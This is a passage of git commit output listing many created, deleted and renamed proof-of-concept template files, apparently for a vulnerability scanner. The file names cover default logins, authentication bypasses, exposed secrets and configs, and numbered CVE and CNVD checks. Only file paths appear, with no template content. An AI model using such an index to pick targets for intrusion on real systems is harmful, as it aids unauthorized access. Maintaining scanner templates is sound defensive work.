mode 100644 poc/auth/alphaweb-default-login.yaml delete mode 100644 poc/auth/ambari-default-login-287.yaml create mode 100644 poc/auth/ambari-default-login-289.yaml delete mode 100644 poc/auth/ametys-admin-login-301.yaml create mode 100644 poc/auth/ametys-admin-login-302.yaml delete mode 100644 poc/auth/apache-flink-unauth-rce-355.yaml delete mode 100644 poc/auth/apc-ups-login.yaml delete mode 100644 poc/auth/api-mojoauth-466.yaml create mode 100644 poc/auth/api-mojoauth.yaml rename poc/auth/{apollo-default-login-521.yaml => apollo-default-login.yaml} (100%) delete mode 100644 poc/auth/argocd-login-534.yaml rename poc/auth/{argocd-login.yaml => argocd-login-536.yaml} (100%) delete mode 100644 poc/auth/arl-default-login-537.yaml delete mode 100644 poc/auth/atvise-login.yaml create mode 100644 poc/auth/authelia-panel.yaml delete mode 100644 poc/auth/avatier-password-management-605.yaml rename poc/auth/{avatier-password-management.yaml => avatier_password_management.yaml} (100%) create mode 100644 poc/auth/aws-access-key-value-624.yaml create mode 100644 poc/auth/aws-opensearch-login-649.yaml delete mode 100644 poc/auth/aws-opensearch-login-650.yaml rename poc/auth/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%) rename poc/auth/{azkaban-default-login-673.yaml => azkaban-default-login.yaml} (100%) rename poc/auth/{basic-auth-detection-687.yaml => basic-auth-detection-689.yaml} (100%) create mode 100644 poc/auth/bazarr-login-702.yaml rename poc/auth/{bigbluebutton-login-726.yaml => bigbluebutton-login-724.yaml} (100%) delete mode 100644 poc/auth/blue-iris-login-751.yaml create mode 100644 poc/auth/blue-iris-login-754.yaml delete mode 100644 poc/auth/braintree-access-token.yaml rename poc/auth/{brother-unauthorized-access-792.yaml => brother-unauthorized-access-793.yaml} (100%) create mode 100644 poc/auth/canal-default-login-846.yaml delete mode 100644 poc/auth/canal-default-login-849.yaml delete mode 100644 poc/auth/chinaunicom-default-login-906.yaml delete mode 100644 poc/auth/cisco-finesse-login-938.yaml create mode 100644 poc/auth/cisco-finesse-login-940.yaml create mode 100644 poc/auth/cisco-systems-login-973.yaml delete mode 100644 poc/auth/cisco-systems-login-975.yaml rename poc/auth/{cisco-ucs-kvm-login-980.yaml => cisco-ucs-kvm-login-979.yaml} (100%) create mode 100644 poc/auth/clickhouse-unauth-1002.yaml delete mode 100644 poc/auth/clickhouse-unauth-1003.yaml rename poc/auth/{cobbler-default-login-1119.yaml => cobbler-default-login-1118.yaml} (100%) delete mode 100644 poc/auth/cobbler-default-login.yaml delete mode 100644 poc/auth/codian-mcu-login-1139.yaml create mode 100644 poc/auth/commax-credentials-disclosure-1160.yaml create mode 100644 poc/auth/credentials-1257.yaml delete mode 100644 poc/auth/credentials-1258.yaml create mode 100644 poc/auth/credentials-disclosure-1256.yaml create mode 100644 poc/auth/crush-ftp-login-1275.yaml create mode 100644 poc/auth/crushftp-default-login.yaml create mode 100644 poc/auth/cs-cart-unauthenticated-lfi-1284.yaml rename poc/auth/{cs-cart-unauthenticated-lfi-1285.yaml => cs-cart-unauthenticated-lfi.yaml} (100%) delete mode 100644 poc/auth/dbeaver-credentials-6780.yaml rename poc/auth/{dell-idrac-default-login-6943.yaml => dell-idrac-default-login.yaml} (100%) delete mode 100644 poc/auth/dell-openmanager-login-6949.yaml delete mode 100644 poc/auth/dell-openmanager-login-6951.yaml create mode 100644 poc/auth/directadmin-login-panel-7000.yaml delete mode 100644 poc/auth/django-secret-key.yaml create mode 100644 poc/auth/django-secret.key.yaml create mode 100644 poc/auth/dolphinscheduler-default-login-7073.yaml rename poc/auth/{dubbo-admin-default-login.yaml => dubbo-admin-default-login-7120.yaml} (100%) rename poc/auth/{dvwa-default-login-7127.yaml => dvwa-default-login.yaml} (100%) delete mode 100644 poc/auth/dvwa-headless-automatic-login-7130.yaml create mode 100644 poc/auth/dvwa-headless-automatic-login-7131.yaml create mode 100644 poc/auth/dynatrace-token-7145.yaml delete mode 100644 poc/auth/dynatrace-token-7146.yaml delete mode 100644 poc/auth/emcecom-default-login-7211.yaml create mode 100644 poc/auth/emqx-default-login-7222.yaml delete mode 100644 poc/auth/ems-login-panel-7223.yaml delete mode 100644 poc/auth/epmp-login.yaml delete mode 100644 poc/auth/etcd-keys-7261.yaml delete mode 100644 poc/auth/etcd-keys-7262.yaml rename poc/auth/{exacqvision-default-login-7277.yaml => exacqvision-default-login.yaml} (100%) delete mode 100644 poc/auth/faraday-login-7395.yaml delete mode 100644 poc/auth/faraday-login-7397.yaml create mode 100644 poc/auth/fatpipe-auth-bypass-7431.yaml delete mode 100644 poc/auth/fatpipe-auth-bypass.yaml delete mode 100644 poc/auth/flir-default-login-7514.yaml create mode 100644 poc/auth/flir-default-login.yaml delete mode 100644 poc/auth/frp-default-login-7556.yaml delete mode 100644 poc/auth/ftp-credentials-exposure-7568.yaml create mode 100644 poc/auth/ftp-credentials-exposure.yaml delete mode 100644 poc/auth/ftp-weak-credentials-7570.yaml create mode 100644 poc/auth/git-credentials-disclosure-7641.yaml rename poc/auth/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%) delete mode 100644 poc/auth/gitlab-public-signup-7683.yaml delete mode 100644 poc/auth/gitlab-weak-login.yaml delete mode 100644 poc/auth/glpi-authentication-7730.yaml create mode 100644 poc/auth/glpi-default-login.yaml delete mode 100644 poc/auth/gmail-api-client-secrets-7741.yaml create mode 100644 poc/auth/google-earth-dlogin-7781.yaml rename poc/auth/{facebook-secrets.yaml => google-secrets.yaml} (100%) delete mode 100644 poc/auth/gophish-login-7795.yaml create mode 100644 poc/auth/gophish-login-7796.yaml create mode 100644 poc/auth/grafana-public-signup-7814.yaml create mode 100644 poc/auth/guacamole-default-login-7859.yaml create mode 100644 poc/auth/hongdian-default-login-7997.yaml delete mode 100644 poc/auth/hongdian-default-login-7999.yaml delete mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8023.yaml create mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8025.yaml create mode 100644 poc/auth/hpe-system-management-login-8017.yaml create mode 100644 poc/auth/htpasswd-detection-8046.yaml delete mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml create mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak.yaml delete mode 100644 poc/auth/huawei-HG532e-default-router-login.yaml create mode 100644 poc/auth/huawei-router-auth-bypass-8076.yaml delete mode 100644 poc/auth/hue-default-credential-8081.yaml delete mode 100644 poc/auth/hue-default-credential.yaml rename poc/auth/{ibm-note-login-8110.yaml => ibm-note-login-8112.yaml} (100%) create mode 100644 poc/auth/icinga-web-login-8134.yaml delete mode 100644 poc/auth/icinga-web-login-8137.yaml delete mode 100644 poc/auth/idemia-biometrics-default-login-8139.yaml rename poc/auth/{idemia-biometrics-default-login.yaml => idemia-biometrics-default-login-8141.yaml} (100%) delete mode 100644 poc/auth/iptime-default-login-8193.yaml delete mode 100644 poc/auth/jellyseerr-login-panel.yaml delete mode 100644 poc/auth/jenkins-login-8277.yaml create mode 100644 poc/auth/jenkins-login-8280.yaml create mode 100644 poc/auth/jfrog-unauth-build-exposed-8299.yaml create mode 100644 poc/auth/jinher-oa-default-login-8312.yaml create mode 100644 poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml delete mode 100644 poc/auth/jira-unauthenticated-popular-filters-8331.yaml rename poc/auth/{jira-unauthenticated-projectcategories-8332.yaml => jira-unauthenticated-projectcategories.yaml} (100%) delete mode 100644 poc/auth/jmx-default-login-8355.yaml create mode 100644 poc/auth/jmx-default-login.yaml create mode 100644 poc/auth/jolokia-unauthenticated-lfi-8366.yaml rename poc/auth/{jolokia-unauthenticated-lfi-8364.yaml => jolokia-unauthenticated-lfi.yaml} (100%) delete mode 100644 poc/auth/jupyter-ipython-unauth-8402.yaml delete mode 100644 poc/auth/jupyterhub-default-login-8400.yaml rename poc/auth/{jwt-token-8410.yaml => jwt-token.yaml} (100%) create mode 100644 poc/auth/kafka-center-default-login.yaml create mode 100644 poc/auth/kasm-login-panel.yaml create mode 100644 poc/auth/keenetic-web-login-8442.yaml delete mode 100644 poc/auth/keenetic-web-login-8443.yaml delete mode 100644 poc/auth/kentico-login-8446.yaml rename poc/auth/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%) delete mode 100644 poc/auth/keycloak-openid-config-8475.yaml create mode 100644 poc/auth/keycloak-openid-config.yaml rename poc/auth/{kubernetes-unauth.yaml => kubernetes-unauth(1).yaml} (100%) delete mode 100644 poc/auth/lucee-login-8665.yaml create mode 100644 poc/auth/lutron-iot-default-login-8675.yaml delete mode 100644 poc/auth/lutron-iot-default-login-8678.yaml delete mode 100644 poc/auth/mailchimp-api-key-8726.yaml delete mode 100644 poc/auth/meshcentral-login-8801.yaml create mode 100644 poc/auth/meshcentral-login-8803.yaml delete mode 100644 poc/auth/mongodb-unauth-8925.yaml create mode 100644 poc/auth/nagios-default-login-8990.yaml delete mode 100644 poc/auth/nagios-default-login-8994.yaml delete mode 100644 poc/auth/netgear-router-auth-bypass-9025.yaml create mode 100644 poc/auth/netgear-router-auth-bypass.yaml delete mode 100644 poc/auth/netsus-default-login-9060.yaml create mode 100644 poc/auth/netsus-default-login.yaml create mode 100644 poc/auth/netsus-server-login-9061.yaml delete mode 100644 poc/auth/netsus-server-login-9062.yaml delete mode 100644 poc/auth/nps-default-login-9145.yaml create mode 100644 poc/auth/nuuno-network-login-9164.yaml rename poc/auth/{nuuno-network-login-9162.yaml => nuuno-network-login.yaml} (100%) create mode 100644 poc/auth/oauth-access-key-9186.yaml delete mode 100644 poc/auth/oauth2-detect-9181.yaml delete mode 100644 poc/auth/octobercms-default-login-9192.yaml create mode 100644 poc/auth/octobercms-default-login.yaml delete mode 100644 poc/auth/ofbiz-default-login-9210.yaml create mode 100644 poc/auth/open-stack-dashboard-login-9321.yaml delete mode 100644 poc/auth/open-stack-dashboard-login-9322.yaml delete mode 100644 poc/auth/openemr-default-login.yaml create mode 100644 poc/auth/oracle-opera-login.yaml create mode 100644 poc/auth/panabit-ixcache-default-login.yaml create mode 100644 poc/auth/panos-default-login-9455.yaml create mode 100644 poc/auth/panos-default-login.yaml create mode 100644 poc/auth/paypal-braintree-token(1).yaml delete mode 100644 poc/auth/paypal-braintree-token-11856.yaml delete mode 100644 poc/auth/pentaho-default-login-9478.yaml create mode 100644 poc/auth/pentaho-default-login-9480.yaml delete mode 100644 poc/auth/pinpoint-unauth-9590.yaml delete mode 100644 poc/auth/polycom-login-9625.yaml create mode 100644 poc/auth/polycom-login-9627.yaml delete mode 100644 poc/auth/possible-AEM-secrets.yaml rename poc/auth/{putty-private-key-disclosure-9732.yaml => putty-private-key-disclosure-9730.yaml} (100%) delete mode 100644 poc/auth/rails-secret-token-disclosure-9809.yaml create mode 100644 poc/auth/rails-secret-token-disclosure-9810.yaml create mode 100644 poc/auth/rainloop-default-login.yaml create mode 100644 poc/auth/ranger-default-login-9827.yaml create mode 100644 poc/auth/rockmongo-default-login-9897.yaml rename poc/auth/{routeros-login-9908.yaml => routeros-login-9909.yaml} (100%) delete mode 100644 poc/auth/routeros-login.yaml delete mode 100644 poc/auth/ruijie-eg-password-leak-9922.yaml delete mode 100644 poc/auth/saferoads-vms-login-9971.yaml create mode 100644 poc/auth/saferoads-vms-login-9973.yaml create mode 100644 poc/auth/samsung-wlan-default-login-10018.yaml delete mode 100644 poc/auth/sangfor-edr-auth-bypass.yaml rename poc/auth/{sauter-login-10089.yaml => sauter-login-10091.yaml} (100%) delete mode 100644 poc/auth/seats-login-10104.yaml create mode 100644 poc/auth/server-backup-login-10153.yaml delete mode 100644 poc/auth/server-backup-login-10156.yaml rename poc/auth/{service-pwd.yaml => service-pwd-10176.yaml} (100%) delete mode 100644 poc/auth/servicedesk-login-panel-10172.yaml create mode 100644 poc/auth/shopify-custom-token(1).yaml delete mode 100644 poc/auth/shopify-custom-token-10198.yaml delete mode 100644 poc/auth/shopify-private-token-11861.yaml create mode 100644 poc/auth/shoppable-token-10209.yaml create mode 100644 poc/auth/shoppable-token.yaml rename poc/auth/{sitefinity-login-10298.yaml => sitefinity-login-10297.yaml} (100%) delete mode 100644 poc/auth/siteomat-login-10300.yaml create mode 100644 poc/auth/siteomat-login-10301.yaml create mode 100644 poc/auth/slack-bot-token-10312.yaml delete mode 100644 poc/auth/solar-log-authbypass-10352.yaml create mode 100644 poc/auth/solar-log-authbypass.yaml delete mode 100644 poc/auth/solarwinds-default-login-10355.yaml create mode 100644 poc/auth/somfy-login-10371.yaml delete mode 100644 poc/auth/somfy-login-10373.yaml delete mode 100644 poc/auth/sonarqube-token-10380.yaml create mode 100644 poc/auth/spark-webui-unauth-10401.yaml delete mode 100644 poc/auth/sphider-login-10407.yaml create mode 100644 poc/auth/sphider-login-10409.yaml delete mode 100644 poc/auth/splunk-enterprise-login-panel.yml create mode 100644 poc/auth/splunk-login-10416.yaml delete mode 100644 poc/auth/square-access-token(1).yaml create mode 100644 poc/auth/square-access-token-11867.yaml create mode 100644 poc/auth/stem-audio-table-private-keys-10535.yaml delete mode 100644 poc/auth/stem-audio-table-private-keys-10536.yaml create mode 100644 poc/auth/stripe-api-key(1).yaml delete mode 100644 poc/auth/stripe-api-key-11869.yaml create mode 100644 poc/auth/stripe-restricted-key.yaml delete mode 100644 poc/auth/submitty-login-10568.yaml create mode 100644 poc/auth/supermicro-default-login.yaml delete mode 100644 poc/auth/symantec-dlp-login-10596.yaml rename poc/auth/{symantec-epm-login-10601.yaml => symantec-epm-login-10599.yaml} (100%) rename poc/auth/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%) create mode 100644 poc/auth/telecom-gateway-default-login.yaml create mode 100644 poc/auth/tidb-unauth-10770.yaml delete mode 100644 poc/auth/tidb-unauth-10772.yaml create mode 100644 poc/auth/tomcat-default-login.yaml create mode 100644 poc/auth/ucmdb-default-login-10871.yaml rename poc/auth/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%) delete mode 100644 poc/auth/unauth-ftp-10942.yaml delete mode 100644 poc/auth/unauth-hoteldruid-panel-10943.yaml create mode 100644 poc/auth/unauth-hoteldruid-panel.yaml delete mode 100644 poc/auth/unauth-spark-api.yaml create mode 100644 poc/auth/unauth-wavink-panel-10967.yaml delete mode 100644 poc/auth/unauth-xproxy-dashboard-10968.yaml create mode 100644 poc/auth/unauth-xproxy-dashboard-10969.yaml create mode 100644 poc/auth/unauthenticated-airflow-10884.yaml delete mode 100644 poc/auth/unauthenticated-airflow-10886.yaml delete mode 100644 poc/auth/unauthenticated-alert-manager-10892.yaml create mode 100644 poc/auth/unauthenticated-frp-10895.yaml delete mode 100644 poc/auth/unauthenticated-frp-10897.yaml create mode 100644 poc/auth/unauthenticated-influxdb-10903.yaml create mode 100644 poc/auth/unauthenticated-mongo-express.yaml create mode 100644 poc/auth/unauthenticated-nacos-access-10912.yaml delete mode 100644 poc/auth/unauthenticated-nacos-access-10915.yaml create mode 100644 poc/auth/unauthenticated-popup-upload-10921.yaml rename poc/auth/{unauthenticated-popup-upload-10922.yaml => unauthenticated-popup-upload.yaml} (100%) delete mode 100644 poc/auth/unauthenticated-prtg-10924.yaml create mode 100644 poc/auth/unauthenticated-prtg-10927.yaml delete mode 100644 poc/auth/unauthenticated-zipkin.yaml delete mode 100644 poc/auth/unauthorized-h3csecparh-login-10948.yaml create mode 100644 poc/auth/unauthorized-h3csecparh-login.yaml create mode 100644 poc/auth/unauthorized-hp-printer-10951.yaml delete mode 100644 poc/auth/unauthorized-plastic-scm-10957.yaml create mode 100644 poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml delete mode 100644 poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml delete mode 100644 poc/auth/vidyo-default-login-11009.yaml rename poc/auth/{vidyo-default-login.yaml => vidyo-default-login-11010.yaml} (100%) create mode 100644 poc/auth/vigor-login-11020.yaml delete mode 100644 poc/auth/vigor-login-11023.yaml create mode 100644 poc/auth/visionhub-default-login-11026.yaml create mode 100644 poc/auth/vpms-auth-bypass-11066.yaml delete mode 100644 poc/auth/vpms-auth-bypass-11068.yaml rename poc/auth/{watchguard-credentials-disclosure-11106.yaml => watchguard-credentials-disclosure.yaml} (100%) delete mode 100644 poc/auth/weblogic-weak-login-11154.yaml delete mode 100644 poc/auth/wifisky-default-password-11205.yaml delete mode 100644 poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml create mode 100644 poc/auth/wordpress-weak-credentials-11336.yaml delete mode 100644 poc/auth/wordpress-weak-credentials-11337.yaml create mode 100644 poc/auth/wpdm-cache-session-11436.yaml delete mode 100644 poc/auth/wpdm-cache-session-11438.yaml delete mode 100644 poc/auth/wso2-default-login.yaml delete mode 100644 poc/auth/xenforo-login-11674.yaml create mode 100644 poc/auth/xenmobile-login-11675.yaml delete mode 100644 poc/auth/xenmobile-login-11677.yaml create mode 100644 poc/auth/xerox7-default-login.yaml create mode 100644 poc/auth/xvr-login-11705.yaml delete mode 100644 poc/auth/xxljob-default-login-11709.yaml create mode 100644 poc/auth/zabbix-server-login-11769.yaml create mode 100644 poc/auth/zeroshell-login-11788.yaml delete mode 100644 poc/auth/zeroshell-login-11790.yaml create mode 100644 poc/auth/zhiyuan-oa-session-leak-11802.yaml rename poc/auth/{zhiyuan-oa-session-leak-11801.yaml => zhiyuan-oa-session-leak.yaml} (100%) create mode 100644 poc/auth/zhiyuan-oa-unauthorized-11806.yaml delete mode 100644 poc/auth/zhiyuan-oa-unauthorized-11808.yaml create mode 100644 poc/auth/zimbra-preauth-ssrf.yaml create mode 100644 poc/auth/zms-auth-bypass-11830.yaml delete mode 100644 poc/auth/zms-auth-bypass-11832.yaml delete mode 100644 poc/aws/amazon-docker-config-280.yaml delete mode 100644 poc/aws/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/aws/amazon-docker-config.yaml delete mode 100644 poc/aws/aws-access-id-618.yaml delete mode 100644 poc/aws/aws-access-id-620.yaml create mode 100644 poc/aws/aws-access-key-value-624.yaml delete mode 100644 poc/aws/aws-bucket-service-628.yaml create mode 100644 poc/aws/aws-bucket-service.yaml delete mode 100644 poc/aws/aws-cloudfront-service-635.yaml delete mode 100644 poc/aws/aws-cognito-638.yaml delete mode 100644 poc/aws/aws-ecs-container-agent-tasks-641.yaml delete mode 100644 poc/aws/aws-elastic-beanstalk-detect.yaml create mode 100644 poc/aws/aws-opensearch-login-649.yaml delete mode 100644 poc/aws/aws-opensearch-login-650.yaml create mode 100644 poc/aws/aws-redirect-651.yaml create mode 100644 poc/aws/awstats-config-656.yaml delete mode 100644 poc/aws/awstats-config.yaml create mode 100644 poc/aws/awstats-script-657.yaml delete mode 100644 poc/aws/awstats-script-658.yaml delete mode 100644 poc/aws/ec2-detection-7162.yaml create mode 100644 poc/aws/ec2-detection-7163.yaml delete mode 100644 poc/aws/metadata-aws.yaml delete mode 100644 poc/aws/s3-subtakeover-9968.yaml create mode 100644 poc/aws/s3-subtakeover-9969.yaml delete mode 100644 poc/backup/db-backup-lfi-6774.yaml create mode 100644 poc/backup/db-backup-lfi-6775.yaml rename poc/backup/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%) create mode 100644 poc/backup/server-backup-login-10153.yaml delete mode 100644 poc/backup/server-backup-login-10156.yaml delete mode 100644 poc/backup/server-backup-manager-se-10157.yaml create mode 100644 poc/backup/server-backup-manager-se-10160.yaml rename poc/backup/{wordpress-total-upkeep-backup-download-11322.yaml => wordpress-total-upkeep-backup-download-11324.yaml} (100%) delete mode 100644 poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml create mode 100644 poc/cisco/cisco-cloudcenter-suite-rce.yaml delete mode 100644 poc/cisco/cisco-finesse-login-938.yaml create mode 100644 poc/cisco/cisco-finesse-login-940.yaml create mode 100644 poc/cisco/cisco-meraki-exposure-944.yaml delete mode 100644 poc/cisco/cisco-meraki-exposure-946.yaml delete mode 100644 poc/cisco/cisco-network-config-949.yaml create mode 100644 poc/cisco/cisco-network-config.yaml delete mode 100644 poc/cisco/cisco-prime-infrastructure-952.yaml create mode 100644 poc/cisco/cisco-prime-infrastructure-954.yaml create mode 100644 poc/cisco/cisco-sd-wan-955.yaml delete mode 100644 poc/cisco/cisco-sd-wan-957.yaml delete mode 100644 poc/cisco/cisco-secure-desktop-962.yaml delete mode 100644 poc/cisco/cisco-security-details-963.yaml rename poc/cisco/{cisco-smi-exposure-972.yaml => cisco-smi-exposure-971.yaml} (100%) create mode 100644 poc/cisco/cisco-systems-login-973.yaml delete mode 100644 poc/cisco/cisco-systems-login-975.yaml create mode 100644 poc/cisco/cisco-telepresence-976.yaml delete mode 100644 poc/cisco/cisco-telepresence-978.yaml rename poc/cisco/{cisco-ucs-kvm-login-980.yaml => cisco-ucs-kvm-login-979.yaml} (100%) delete mode 100644 poc/coldfusion/adobe-coldfusion-detect-82.yaml create mode 100644 poc/coldfusion/adobe-coldfusion-error-detect-86.yaml rename poc/coldfusion/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%) create mode 100644 poc/coldfusion/coldfusion-debug-xss-1153.yaml delete mode 100644 poc/coldfusion/coldfusion-debug-xss.yaml create mode 100644 poc/coldfusion/unpatched-coldfusion-10979.yaml rename poc/config/{aerohive-netconfig-ui.yaml => aerohive-netconfig-ui-200.yaml} (100%) create mode 100644 poc/config/airflow-configuration-exposure-230.yaml delete mode 100644 poc/config/airflow-configuration-exposure.yaml delete mode 100644 poc/config/amazon-docker-config-280.yaml delete mode 100644 poc/config/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/config/amazon-docker-config.yaml create mode 100644 poc/config/ansible-config-disclosure-326.yaml delete mode 100644 poc/config/ansible-config-disclosure.yaml create mode 100644 poc/config/api-iconfinder-439.yaml create mode 100644 poc/config/awstats-config-656.yaml delete mode 100644 poc/config/awstats-config.yaml create mode 100644 poc/config/bigip-config-utility-detect-730.yaml create mode 100644 poc/config/bigip-config-utility-detect-732.yaml delete mode 100644 poc/config/buffalo-config-injection-798.yaml create mode 100644 poc/config/buffalo-config-injection-800.yaml create mode 100644 poc/config/buffalo-config-injection-801.yaml create mode 100644 poc/config/circleci-config-923.yaml delete mode 100644 poc/config/cisco-network-config-949.yaml create mode 100644 poc/config/cisco-network-config.yaml create mode 100644 poc/config/config-rb-1179.yaml rename poc/config/{config-rb-1180.yaml => config-rb.yaml} (100%) delete mode 100644 poc/config/confluence-detect-1187.yaml create mode 100644 poc/config/confluence-detect-1189.yaml create mode 100644 poc/config/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/config/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/config/cors-misconfig-1223.yaml delete mode 100644 poc/config/docker-compose-config-7059.yaml create mode 100644 poc/config/docker-compose-config.yaml delete mode 100644 poc/config/dockercfg-config.yaml delete mode 100644 poc/config/firebase-config-exposure.yaml create mode 100644 poc/config/front-page-misconfig-7547.yaml rename poc/config/{ftpconfig.yaml => ftpconfig-7565.yaml} (100%) create mode 100644 poc/config/git-config-7635.yaml rename poc/config/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%) create mode 100644 poc/config/git-config-nginxoffbyslash-7630.yaml create mode 100644 poc/config/github-page-config-7654.yaml delete mode 100644 poc/config/gocd-cruise-configuration-7748.yaml rename poc/config/{honeywell-scada-config.yaml => honeywell-scada-config-7990.yaml} (100%) delete mode 100644 poc/config/honeywell-scada-config-7992.yaml create mode 100644 poc/config/htaccess-config-8043.yaml create mode 100644 poc/config/httpd-config-8055.yaml delete mode 100644 poc/config/httpd-config.yaml delete mode 100644 poc/config/keycloak-openid-config-8475.yaml create mode 100644 poc/config/keycloak-openid-config.yaml delete mode 100644 poc/config/magento-config-disclosure.yaml rename poc/config/{misconfigured-docker-8902.yaml => misconfigured-docker-8900.yaml} (100%) create mode 100644 poc/config/msmtp-config-8967.yaml rename poc/config/{nginx-config.yaml => nginx-config-9099.yaml} (100%) delete mode 100644 poc/config/parameters-config-9465.yaml create mode 100644 poc/config/parameters-config.yaml create mode 100644 poc/config/prometheus-config-9673.yaml delete mode 100644 poc/config/prometheus-config.yaml delete mode 100644 poc/config/samba-config-9987.yaml create mode 100644 poc/config/samba-config.yaml delete mode 100644 poc/config/springboot-autoconfig.yaml create mode 100644 poc/config/springboot-configprops-10442.yaml delete mode 100644 poc/config/symfony-database-config-10616.yaml rename poc/config/{symfony-database-config.yaml => symfony-database-config-10617.yaml} (100%) create mode 100644 poc/config/tcpconfig.yaml delete mode 100644 poc/config/tugboat-config-exposure-10842.yaml rename poc/config/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%) delete mode 100644 poc/config/wamp-server-configuration-11096.yaml delete mode 100644 poc/config/web-config-11125.yaml delete mode 100644 poc/config/wordpress-accessible-wpconfig-11235.yaml delete mode 100644 poc/config/wordpress-git-config-11278.yaml delete mode 100644 poc/config/wpengine-config-check.yaml create mode 100644 poc/config/zend-config-file-11778.yaml delete mode 100644 poc/config/zend-config-file-11779.yaml create mode 100644 poc/crlf_injection/crlf-injection-1262.yaml rename poc/cross_site_request_forgery/{csrfguard-detect-1290.yaml => csrfguard-detect.yaml} (100%) create mode 100644 poc/cve/CNVD-2021-26422.yaml create mode 100644 poc/cve/CVE-2019-9082 (copy 2).yaml delete mode 100644 poc/cve/CVE-2020-10124 (copy 1).yaml create mode 100644 poc/cve/CVE-2022-0921.yaml create mode 100644 poc/cve/CVE-2023-34039.yaml create mode 100644 poc/cve/CVE-2024-1183.yaml create mode 100644 poc/cve/CVE-2024-32651.yaml create mode 100644 poc/cve/CVE-2024-35668.yaml create mode 100644 poc/cve/CVE-2024-3668.yaml create mode 100644 poc/cve/CVE-2024-4468.yaml create mode 100644 poc/cve/CVE-2024-4661.yaml create mode 100644 poc/cve/CVE-2024-5087.yaml create mode 100644 poc/cve/CVE-2024-5091.yaml create mode 100644 poc/cve/CVE-2024-5613.yaml create mode 100644 poc/cve/CVE-2024-5638.yaml create mode 100644 poc/cve/CVE-2024-5654.yaml create mode 100644 poc/cve/CVE-2024-5663.yaml create mode 100644 poc/cve/CVE-2024-5758.yaml create mode 100644 poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml delete mode 100644 poc/cve/cnvd-2019-01348-1042.yaml create mode 100644 poc/cve/cnvd-2019-01348-1044.yaml create mode 100644 poc/cve/cnvd-2019-06255-1046.yaml delete mode 100644 poc/cve/cnvd-2019-06255-1050.yaml create mode 100644 poc/cve/cnvd-2019-32204-1053.yaml delete mode 100644 poc/cve/cnvd-2019-32204-1054.yaml rename poc/cve/{cnvd-2020-56167-1064.yaml => cnvd-2020-56167-1061.yaml} (100%) rename poc/cve/{cnvd-2020-62422-1068.yaml => cnvd-2020-62422-1069.yaml} (100%) delete mode 100644 poc/cve/cnvd-2020-68596-1073.yaml create mode 100644 poc/cve/cnvd-2020-68596-1074.yaml create mode 100644 poc/cve/cnvd-2021-01931-1078.yaml delete mode 100644 poc/cve/cnvd-2021-10543-1082.yaml rename poc/cve/{cnvd-2021-14536-1088.yaml => cnvd-2021-14536-1087.yaml} (100%) delete mode 100644 poc/cve/cnvd-2021-15822-1089.yaml create mode 100644 poc/cve/cnvd-2021-15822-1093.yaml rename poc/cve/{cnvd-2021-15824-1096.yaml => cnvd-2021-15824-1097.yaml} (100%) delete mode 100644 poc/cve/cnvd-2021-26422-1103.yaml create mode 100644 poc/cve/cnvd-2021-28277-1105.yaml delete mode 100644 poc/cve/cnvd-2021-30167-1108.yaml rename poc/cve/{cnvd-2021-49104-1113.yaml => cnvd-2021-49104-1114.yaml} (100%) create mode 100644 poc/cve/cnvd-2022-03672-1116.yaml delete mode 100644 poc/cve/cnvd-2022-03672-1117.yaml create mode 100644 poc/cve/cve-2000-0114-1297.yaml create mode 100644 poc/cve/cve-2002-1131-1304.yaml delete mode 100644 poc/cve/cve-2007-4504-1342.yaml create mode 100644 poc/cve/cve-2008-6222.yaml delete mode 100644 poc/cve/cve-2008-6668-1400.yaml create mode 100644 poc/cve/cve-2009-0545.yaml delete mode 100644 poc/cve/cve-2009-1496.yaml delete mode 100644 poc/cve/cve-2009-2015-1441.yaml delete mode 100644 poc/cve/cve-2009-2100-1446.yaml delete mode 100644 poc/cve/cve-2009-3053.yaml create mode 100644 poc/cve/cve-2010-0943.yaml delete mode 100644 poc/cve/cve-2010-0972-1522.yaml create mode 100644 poc/cve/cve-2010-0982.yaml delete mode 100644 poc/cve/cve-2010-1056.yaml delete mode 100644 poc/cve/cve-2010-1302-1567.yaml delete mode 100644 poc/cve/cve-2010-1305-1574.yaml delete mode 100644 poc/cve/cve-2010-1307-1585.yaml delete mode 100644 poc/cve/cve-2010-1308.yaml create mode 100644 poc/cve/cve-2010-1312-1598.yaml create mode 100644 poc/cve/cve-2010-1312.yaml create mode 100644 poc/cve/cve-2010-1313-1604.yaml delete mode 100644 poc/cve/cve-2010-1314.yaml create mode 100644 poc/cve/cve-2010-1315.yaml create mode 100644 poc/cve/cve-2010-1345-1621.yaml create mode 100644 poc/cve/cve-2010-1345.yaml delete mode 100644 poc/cve/cve-2010-1352.yaml delete mode 100644 poc/cve/cve-2010-1353-1630.yaml create mode 100644 poc/cve/cve-2010-1469.yaml create mode 100644 poc/cve/cve-2010-1470-1653.yaml delete mode 100644 poc/cve/cve-2010-1474.yaml delete mode 100644 poc/cve/cve-2010-1491.yaml create mode 100644 poc/cve/cve-2010-1494.yaml delete mode 100644 poc/cve/cve-2010-1532.yaml delete mode 100644 poc/cve/cve-2010-1540-1729.yaml delete mode 100644 poc/cve/cve-2010-1657-1761.yaml create mode 100644 poc/cve/cve-2010-1658-1765.yaml create mode 100644 poc/cve/cve-2010-1658.yaml delete 